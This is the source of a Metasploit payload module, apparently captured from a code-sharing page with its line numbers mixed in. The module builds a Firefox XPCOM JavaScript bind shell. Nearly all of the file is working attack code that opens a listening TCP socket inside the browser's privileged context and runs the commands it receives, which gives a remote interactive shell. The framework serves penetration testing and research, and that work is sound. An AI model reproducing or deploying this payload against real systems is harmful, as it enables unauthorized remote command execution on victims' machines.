Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6

7
module MetasploitModule
8

9
  CachedSize = :dynamic
10

11
  include Msf::Payload::Single
12
  include Msf::Payload::Firefox
13
  include Msf::Sessions::CommandShellOptions
14

15
  def initialize(info = {})
16
    super(merge_info(info,
17
      'Name'          => 'Command Shell, Bind TCP (via Firefox XPCOM script)',
18
      'Description'   => %q{Creates an interactive shell via Javascript with access to Firefox's XPCOM API},
19
      'Author'        => ['joev'],
20
      'License'       => BSD_LICENSE,
21
      'Platform'      => 'firefox',
22
      'Arch'          => ARCH_FIREFOX,
23
      'Handler'       => Msf::Handler::BindTcp,
24
      'Session'       => Msf::Sessions::CommandShell,
25
      'PayloadType'   => 'firefox'
26
    ))
27
  end
28

29
  #
30
  # Returns the JS string to use for execution
31
  #
32
  def generate(_opts = {})
33
    %Q|
34
    (function(){
35
      window = this;
36
      Components.utils.import("resource://gre/modules/NetUtil.jsm");
37
      var lport = #{datastore["LPORT"]};
38
      var rhost = "#{datastore['RHOST']}";
39
      var serverSocket = Components.classes["@mozilla.org/network/server-socket;1"]
40
                             .createInstance(Components.interfaces.nsIServerSocket);
41
      serverSocket.init(lport, false, -1);
42

43
      var listener = {
44
        onSocketAccepted: function(serverSocket, clientSocket) {
45
          var outStream = clientSocket.openOutputStream(0, 0, 0);
46
          var inStream = clientSocket.openInputStream(0, 0, 0);
47
          var pump = Components.classes["@mozilla.org/network/input-stream-pump;1"]
48
                     .createInstance(Components.interfaces.nsIInputStreamPump);
49
          pump.init(inStream, -1, -1, 0, 0, true);
50
          pump.asyncRead(clientListener(outStream), null);
51
        }
52
      };
53

54
      #{read_until_token_source}
55

56
      var clientListener = function(outStream) {
57
        return {
58
          onStartRequest: function(request, context) {},
59
          onStopRequest: function(request, context) {},
60
          onDataAvailable: readUntilToken(function(data) {
61
            runCmd(data, function(err, output) {
62
              if(!err) outStream.write(output, output.length);
63
            });
64
          })
65
        };
66
      };
67

68
      #{run_cmd_source}
69

70
      serverSocket.asyncListen(listener);
71
    })();
72
    |
73
  end
74
end
75

76